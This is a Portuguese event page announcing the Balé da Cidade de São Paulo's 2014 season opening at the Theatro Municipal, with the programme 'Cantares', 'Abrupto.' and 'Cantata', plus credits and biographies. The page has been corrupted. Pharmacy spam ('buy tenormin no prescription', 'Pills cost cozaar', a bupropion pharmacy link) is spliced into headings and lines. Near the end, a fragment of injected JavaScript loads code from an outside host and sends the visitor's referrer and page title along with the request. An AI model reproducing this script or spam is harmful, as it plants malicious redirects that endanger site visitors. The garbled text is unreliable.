Balé/DançaMovimentoProgramaçãoSão Paulo

Balé da Cidade abre temporada 2014 do TMSP

Companhia celebra aniversário de São Paulo com coreografia inédita.

SERVIÇO

 

Theatro Municipal de São Paulo
buy tenormin no prescription Praça Ramos de Azevedo, s/nº.
Fone: 11 3397-0300 / Bilheteria: 3397-0327

Dias 25 a 29 de janeiro, às 20h. e dia 31 de janeiro, às 18h.

Ingressos: R$ 20,00 a R$ 60,00
Meia entrada para estudantes. online

Sugestão de faixa etária: acima de 10 anos.

www.ingressorapido.com.br

Bilheteria do Theatro Municipal SP
De segunda a sábado das 10h às 19h.
Domingo das 10 às 17h.
Nos espetáculos à noite, até o início do evento;
Em dias de espetáculos pela manhã, a partir das 9h.

 

O Balé da Cidade, grupo artístico da Fundação Theatro Municipal de São Paulo, abre a temporada 2014 do teatro com estreia da coreografia “Cantata”, de Mauro Bigonzetti. O programa, que também traz remontagens de “Cantares” e “Abrupto”, com estreia no dia 25 de janeiro, aniversário da cidade de São Paulo, e fica em cartaz no teatro até o dia 29 de janeiro.

Sob a direção artística de Iracity Cardoso, o Balé da Cidade inicia uma nova temporada que apresentará ao público um total de nove coreografias, sendo seis delas inéditas. Para a estreia, a companhia escolheu uma coreografia vibrante e vigorosa – que representa bem o grupo, que em fevereiro de 2014 encerra as comemorações dos 45 anos de sua fundação. “Cantata tem a energia dos imigrantes italianos que vieram para São Paulo. É dramática e solar, assim como sua cultura. É uma excelente representação de força e vitalidade de SP e do nosso Balé”, destaca a diretora.

Força, gestual marcante e ritmo frenético são de fato as principais características dessa montagem, que chega ao Brasil assinada pelo coreógrafo italiano, Mauro Bigonzetti, que trabalha pela segunda vez com o Balé da Cidade. O último trabalho foi Zona-Minada em 2003.

“Cantata”, que homenageia a cultura italiana e a tradição musical, é uma obra popular no sentido mais elevado do termo. Inclui música italiana de 1.700 e 1.800, desde canções de ninar até pizziche Salentina e serenatas Napolitanas.

 

PROGRAMA

– Cantares, de Oscar Araiz

– Abrupto., de Alex Soares

– Cantata, de Mauro Bigonzetti

 

BALÉ DA CIDADE DE SÃO PAULO

– Diretora Artística: Iracity Cardoso
– Assistentes de Direção : Alexandra Itacarambi, Raymundo Costa, Silvana Marani
– Coordenação de Ensaios: Suzana Mafra
– Assistentes de coreografia: Kênia Genaro, Roberta Botta e Suzana Mafra
– Maitre de ballet: Liliane Benevento
– Professor convidado: Milton Kennedy
– Pianista: Wirley Francini
– Inspetor: Deoclides Fraga Neto
– Coordenadora técnica: Melissa Guimarães
– Iluminador: Cristiano Pedott
– Sonoplasta: Leandro Lima
– Coordenadora do figurino: Bruna Fernandes
– Camareira: Juliana Andrade
– Maquinista: José Hilton Jr.
– Secretaria: Doralice de Queiróz
– Expediente: Lenira Alberto
– Coordenação do acervo: Raymundo Costa

– Bailarinos (as): Bruno Gregório, Camila Ribeiro, Cleber Fantinatti, Erika Ishimaru, Eugênia Vasconcellos, Fabiana Fornes, Fabiana Ikehara, Fabio Pinheiro, Fernanda Bueno, Gleidson Vigne, Gustavo Barros, Hamilton Felix, Igor Vieira, Irupé Sarmiento, Jaruam Miguez, Jefferson Damasceno, Joaquim Tomé, Laura Ávila, Leonardo Hoehne Polato, Liliane de Grammont, Luiz Oliveira, Manuel Gomes, Marcos Novais, Marina Giunti, Marisa Bucoff, Rebeca Ferreira, Renata Bardazzi, Shamara Bacelar, Simone Camargo, Thaís França, Victor Hugo Vila Nova, Victoria Oggiam, Vivian Navega Dias, Wagner Varela, Yasser Díaz



CANTARES

Criado em 1982 para o Ballet du Grand Théatre de Genève e remontado para o Balé da Cidade em 1984, 1990 e 2013

– Coreografia e Desenho de Luz: Oscar Araiz
– Música: Maurice Ravel – Rapsódia Espanhola
– Remontagem: Andréa Maia
– Assistente de Coreografia: Suzana Mafra
– Figurinos Originais: Carlos Cytrynowski
– Recriação de Figurino: Madalena Machado
– Nº de Intérpretes: 09

Sinopse

Cantares é uma peça para mulheres sobre a temática do feminino e hispânico. É parte de um conjunto de quatro coreografias que formam a obra “Ibérica”, inspirada na poesia, na pintura e na música desta cultura.

É a expressão de nove mulheres que carregam dentro de si a mais profunda essência do espírito feminino. É o grito da mulher, no caso a espanhola, mas que traz dentro de si a universalidade.

 

ABRUPTO. Order

Criado para o Balé da Cidade em 2013.

– Coreografia e Desenho de Luz: Alex Soares
– Música: Arvo Pärt –Mein Weg, Tabula Rasa (2º Movimento: Silentium – Em acordo com a Universal Edition AG, Vienna
– Assistente de Coreografia: Kênia Genaro
– Figurinos: Cassiano Grandi
– Nº de Intérpretes: 10

Sinopse

Ambientada por duas músicas contrastantes compostas em épocas distintas pelo estoniano Arvo Part,  Abrupto. retrata o momento de uma catarse – quando agimos por um impulso irracional – e o desdobramento que ocorre imediatamente após esse evento –  o estado de esgotamento, liberação e ampliação de consciência daquilo que acaba de ocorrer.

Abrupto., assim como numa trajetória de vida, também nos confronta com modelos de relações, onde indivíduo e grupo estão conectados de maneira imprevisível.

 

Pills cost cozaar CANTATA

Estreia pelo Ballet Gulbenkian, no Teatro Municipal Rivoli, Porto, em 29 de junho de 2001.

– Coreografia: Mauro Bigonzetti
– Música: Canções originais e tradicionais napolitanas e do sul da Itália, composição e arranjos de Assurd, com Cristina Vetrone, Lorella Monti, Enza Prestia e participação especial de Enza Pagliara.
– Remontagem: Roberto Zamorano
– Assistente de Coreografia: Kênia Genaro, Suzana Mafra
– Figurinos: Helena Medeiros
– Confecção de Figurinos: Madalena Machado
– Desenho de Luz: Carlo Cerri
– Número de Intérpretes: 20

Sinopse

“Cantata” é uma explosão coreográfica com as típicas cores vibrantes do Sul. Seus gestos apaixonados e viscerais evocam um tipo de beleza selvagem do Mediterrâneo. Uma dança instintiva e vital que explora as várias facetas da relação entre homem e mulher: sedução, paixão, brigas, ciúme. A obra homenageia a cultura italiana e a tradição musical, uma obra popular no sentido mais elevado do termo. Inclui música italiana de 1700 e 1800 que vão de canções de ninar até pizziche Salentina e serenatas Napolitanas. Nesta obra, criada após encontro com um grupo de músicos de Nápoles e Puglia, dança e música se misturam fortemente.

BIOGRAFIAS

Pills Iracity Cardoso  – Diretora Artística

Formada pela Escola de Dança de São Paulo, teve sua primeira experiência internacional como bailarina em 1964/67, na Alemanha, França e México. Foi professora do Ballet Stagium e diretora do Balé da Cidade de São Paulo. Em 1980, foi assistente de direção e bailarina no Ballet Du Grand Theatre de Genebra, até que em 1988 se tornou Diretora Artística Adjunta. Depois de 1996 passou a trabalhar como Diretora Artística do Ballet Gulbenkian em Portugal.

De volta ao Brasil, em 2006/07 foi Assessora de Dança da SMC de SP, onde reativa o Centro de Dança da Galeria Olido. Promove a publicação do Primeiro Edital de Fomento à Dança e inicia um projeto de dança vocacional. De 2008 a 2012, foi Diretora Artística Fundadora da São Paulo Companhia de Dança. Foi Jurada no Concurso Internacional de Dança do “Prix de Lausanne”, na Suíça em 2010. Em 2013, foi convidada pelo Maestro John Neschling para assumir a Direção Artística do Balé da Cidade de São Paulo.

 

Oscar AraizCoreógrafo

Natural da Argentina, estudou dança com Dore Hoyer, Renate Schottelius, María Ruanova e Tamara Grigorieva. Criou e dirigiu o Ballet del Teatro San Martín apresentando Symphonía, Magnificat, Romeu e Julieta e A Sagração da Primavera. Como diretor do Ballet del Teatro Colón em 1979 e 2005/2006 coreografou Estancia, O Mandarin Maravilhoso, Sonhos de uma Noite de Verão e um Tributo a Stravinsky/Diaghilev, com as obras Les Noces, O Rouxinol e Petroushka.

Colaborou com o Royal Winnipeg Ballet do Canadá criando Eternity is now – Gustav Mahler, 4th Symphony – Como Diretor de Dança do Grand Théâtre de Geneve, de 1980 a 1988, coreografou  Pulcinella, O Beijo, Rapsodia, Tango, Ibérica, Mathis o  Pintor, O Mar, Os Sete Pecados Capitais, A Noite Transfigurada, O  Carnaval dos  Animais,  O Público, Child Alice, Os Quatro Temperamentos e encenou La Cenerentola de Rossini.

De 1990 a 1997, dirigiu o Ballet Contemporáneo del Teatro San Martín, estreiando Numen, Noche de Ronda, Bestiario – com a participação de Julio Bocca – e Boquitas Pintadas, uma versão dirigida em colaboração com Renata Schussheim, sobre a novela de Manuel Puig, pela qual recebeu cinco nominações da Asociación de Cronistas del Espectáculo em 1997.

Coreografou para a Opera de Paris, Berlim, Roma, Ballet Nice Mediterranée, Finnish Ballet,  Balé da Cidade de São Paulo, Teatro Municipal do Rio de Janeiro, Joffrey Ballet de New York, Ballets Nacionales de Chile, Portugal, SODRE de Uruguay, Ballet Gulbenkian, Grupo Corpo e Group Motion Multimedia Dance Theater de Philadelphia. Recebeu prêmios da Cámara Juniors, Universidad de Buenos Aires, Prêmio Governador do Estado de São Paulo,  Associação  Paulista de Críticos de Arte, Segundo Concurso Mundial no Japão,  Asociación Argentina de Actores, María Ruanova, Konex,  ACE  pelo arranque do Complexo Cultural Margarita Xirgu e o Laurel de Plata del Rotary Club. É membro da Academia Nacional de Música da Argentina.

Entre suas produções figuram  Fenix, Stelle, Fausto Tango com Alessandra Ferri, El Amor Brujo, a Sonata 32 de Beethoven, Orestes – ópera tango sobre El Reñidero de S. De Cecco, Bagatelles de Ligeti, La Cabalgata Argentina, Flúmina, sobre la Missa de Réquiem de Faure, Escrito en el Aire de  Schnittke, María de Buenos Aires, de Piazzolla/Ferrer e Torito de Cortázar,  na exposição  Cortázar Presencias no Centro Cultural Recoleta.

Dirige o Curso de Dança Contemporânea de Arte XXI e a Área de Dança da  Universidad Nacional de San Martín cujo grupo apresentou Las Siete Palabras de Haydn, Las Troyanas de Eurípides e La Viajera, sobre um conto de  Mujica Láinez, sendo premiado no Festival de Danza Contemporánea da Argelia, em 2012.

Linha do tempo das obras de Oscar Araiz para o Balé da Cidade

– 1976 – Canções – Oscar Araiz – Música: Gustav Mahler
– 1976/1984 – Mulheres – Música: Grace Slick
– 1977 – Prelúdios de Chopin – Música: Frederic Chopin
– 1978 – Cenas de Família – Música: Francis Poulenc
– 1984/1990 – Cantares – Música: Maurice Ravel
– 1990/2003 –  Adagietto – Música: Gustav Mahler
– 1990 – Mathis, O Pintor – Música: Paul Hindemith
– 1992/2003 – Salmos – Música: Igor Stravinsky

Prêmios de Oscar Araiz com o Balé da Cidade

– APCA 1976
– Melhor Coreografia: Canções
– Governador do Estado 1976
– Melhor Coreografia: Canções
– APCA 1977
– Melhor Coreografia: Prelúdios de Chopin
– APCA 1978
– Melhor Coreografia: Cenas de Família
– Melhor Coreógrafo por Cenas de Família
– Governador do Estado 1978
– Melhor Coreografia: Cenas de Família

 

http://goingonfaith.com/bupropion-sr-online-pharmacy/ Alex SoaresCoreógrafo

Natural de São Bernardo do Campo/SP, dançou no Balé da Cidade de São Paulo, Balé Teatro Guaíra e Cisne Negro Cia. de Dança, onde obteve experiência variada com uma gama de coreógrafos nacionais e internacionais. Sua estreia coreográfica foi em 2006, com Antiprisma, apresentado no workshop para novos coreógrafos do Balé da Cidade. Em 2008, criou Solo a Dois, que foi apresentado em Curitiba, São Paulo e outras capitais brasileiras. Alex estudou cinema e utiliza esse conhecimento nas suas produções cênicas e também na criação de videodanças. Sua videodança Por um momento perdido de 2009, recebeu o prêmio de melhor video no Festival do Minuto de 2010. Em 2009 ainda como bailarino do Balé da Cidade de São Paulo cria a obra WiiPrevisto, trabalho que entrou para o repertório da Companhia e que foi muito bem recebido no Brasil e na Europa. Em 2010, Alex decide deixar o Balé da Cidade para dedicar-se exclusivamente a arte da criação e aprofundar sua pesquisa de linguagem.

No final de 2010, fundou sua própria companhia, o Projeto Mov_oLA, e foi convidado pelo Centro Cultural São Paulo para criar estudos em Chrom.Aqui, que estreou em 2011 com grande sucesso de público. No mesmo ano, foi convidado pela Noord Nederlandse Dans, companhia sediada em Groningen, Holanda, para criar uma videodança para a companhia e criou para o Projeto Mov_oLA Desorientações de Wii e Som, comissionado pelo 15º. Cultura Inglesa Festival, em São Paulo.

Em 2012, criou para o Mov_oLA o dueto Coup de grace, dueto que foi selecionado para o 26th International Choreography Competition, evento que anualmente reúne promissores coreógrafos da dança mundial em Hannover, Alemanha. Ganhou no final de 2012 o 4th Pretty Creatives International Choreography Competition, o que possibilitou criar a coreografia Trace in Loss para a Northwest Dance Project, companhia sediada em Portland- USA. Em 2013, graças ao XIII Edital do Fomento a Dança, ampliou o Projeto Mov_oLA e criou em conjunto com Paula Zonzini sua primeira obra de noite inteira, intitulada OroborO. Como coreógrafo convidado tem criações agendadas em 2013 com a Ribeirão Preto Cia de Dança, Balé Teatro Castro Alves e a Hubbard Street Dance – Chicago.

Obra de Alex Soares para o Balé da Cidade Pills

– 2009 – Wii Previsto – Música: Johnny Greenwood

 

 Mauro BigonzettiCoreógrafo

Mauro Bigonzetti nasceu em Roma. Formou-se na Scuola del Teatro dell’Opera em Roma e foi aceito na companhia da sua cidade natal. Após dez anos no Teatro dell’Opera di Roma, foi integrar a Compagnia Aterballetto, em 1982-83, sob a direção artística de Amedeo Amodio. Bigonzetti participou de todas as coreografias do repertório da companhia e dançou vários trabalhos de George Balanchine e Leonide Massine. Destacou-se como um dos principais solistas, interpretando as criações de Alvin Ailey, Glen Tetley, William Forsythe e Jennifer Muller.

Em 1990, criou seu primeiro trabalho Sei in movimento com  música de J. S. Bach, que estreou no Teatro Sociale em Grassina. Após deixar o Aterballetto, tornou-se coreógrafo freelancer, trabalhando com o Balletto di Toscana, English National Ballet (Londres), Ballet National (Marseille), Stuttgarter Ballett, Deutsche Oper Berlin, Staatsoper Dresden, Ballet Teatro Argentino, Balé da Cidade de São Paulo (Brasil), Ballet Gulbenkian (Lisboa), State Ballet Ankara e Ballet du Capitole (Toulouse).

Mauro Bigonzetti também criou para companhias italianas incluindo as companhias: Teatro alla Scala de Milão, Opera de Roma, Arena Verona e Teatro San Carlo de Nápole. De 1997 até 2007, foi diretor artístico da Compagnia Aterballetto, construindo novo repertório e uma nova companhia. Em 2008, passou à ocupar a função de coreógrafo residente do Aterballetto. Seus trabalhos mais significativos para o Aterballetto são Pression, Cantata, Rossini Cards, Les Noces, WAM, Romeo and Juliet, InCanto, Certe Notti, Le Sacre e Canto per Orfeo.

Além disto, ele foi comissionado para criar e remontar seus trabalhos para o Stuttgarter Ballett (I Fratelli and Il Concertone), Alvin Ailey Dance Theatre (Festa Barocca), New York City Ballet (Vespro, In Vento, Oltremare and Luce Nascosta), Les Grands Ballets Canadiens (Le Quattro Stagioni), Ballets Jazz de Montreal, the Staatsoper Berlin (Caravaggio), the Staatsoper Hannover (La Piaf),  Ballett Basel, entre outros.

Obra de Mauro Bigonzetti para o Balé da Cidade

– 2003 – Zona-Minada – Música: Mina, Ivano Fossati, Daniele Silvestre, Migliacci, De Filippi, Pisano, Rizza, Mogol, Ascri, Sofficci, Calabresi, Rossi, Testa, Cortez, Amurri, Canfora

 

Roberto ZamoranoRemontagem

Roberto Zamorano nasceu em Cali, Colômbia, e começou seu treinamento em balé no Ballet Clássico Incolballet. Dançou em companhias como o Ballet de Cali, Ballet Contemporaneo de Caracas, Northern Ballet Theatre, Florida Ballet, Ballet Biarritz e Aterballetto.

Em sua cidade natal, apresentou-se principalmente com repertórios clássicos e contemporâneos sob a direção de Gloria Castro, sua professora, e sob a direção do  Ballet Nacional de Cuba. Teve também oportunidade de apresentar trabalhos de grandes coreógrafos como: Gustavo Herrera,  Maria Eugenia Barrios, Massimo Moricone, Thierry Malandine, Michael Pink, Christopher Gable, Jacopo Godani, Neel Verdoon, Christian Spuck, Fabrizzio Monteverde, Mauro Bigonzetti, George Balanchine, Vicente Nebrada, Ben Stevenson, entre outros.

Como professor de ballet e coreógrafo assistente, começou a ensinar no Aterballetto, durante a direção de Mauro Bigonzetti e continuou com o Les Ballet jazz de Montreal em 2009, tendo a oportunidade de ensinar o repertório dos seguintes coreógrafos: Cayetano Soto, Aszure Barton, Annabelle Lopez Ochoa and Wen Wei Wang.

Como professor convidado trabalhou com Alvin Ailey American Dance Theater, Staatsoper Hannover Ballet, Ballet Santiago de Chile, Ballet Sancarlo di Napoli, Noor Nederlandse, Balleto del Teatro di Torino e Aterballetto. Em 2011, começou a trabalhar como freelancer e tem participado no programa de TV “Amici”em Roma, Itália.

 


ASSURD – 1993

– Cristina Vetrone: voz e acordeão
– Lorella Monti: voz e percussão
– Enza Prestia: voz e percussão
– Participação especial – Enza Pagliara: voz e percussão

O grupo musical foi fundado em 1993 e tem como principal foco as canções e a música popular tradicional do Sul da Itália. A banda inicialmente foi formada por três mulheres: Cristina Vetrone, Lorella Monti e Enza Prestia. Sua inspiração vem diretamente dos cantores antigos, renovando registros existentes sobre o assunto, por meio da fusão da metodologia da cultura camponesa, onde há séculos as festa são lugares de transmissão oral da cultura tradicional.

Uma das fontes de pesquisa do grupo foi o material coletado, em anos pós-segunda guerra, por Alan Lomax, Diego Carpitella, Ernesto De Martino e Roberto Leydi, que deixaram pistas de interesse para sempre sobre esta música e estas tradições. E a partir destas fontes, o Assurd retomou, entre outras coisas, o “Tammurriate” (canções e danças da tradição local), o “Pizziche” (a partir da tradução italiana de “Beliscar”, ligado ao fenômeno do Taranto da região de Pugliese), as “Tarantellas”, as canções de protesto ligadas à esfera do trabalho e da emigração, e as serenatas. Ao longo dos anos, o repertório enriqueceu-se com composições originais proporcionando uma sensação de continuidade e constante movimento no sentido da tradição.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) {

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.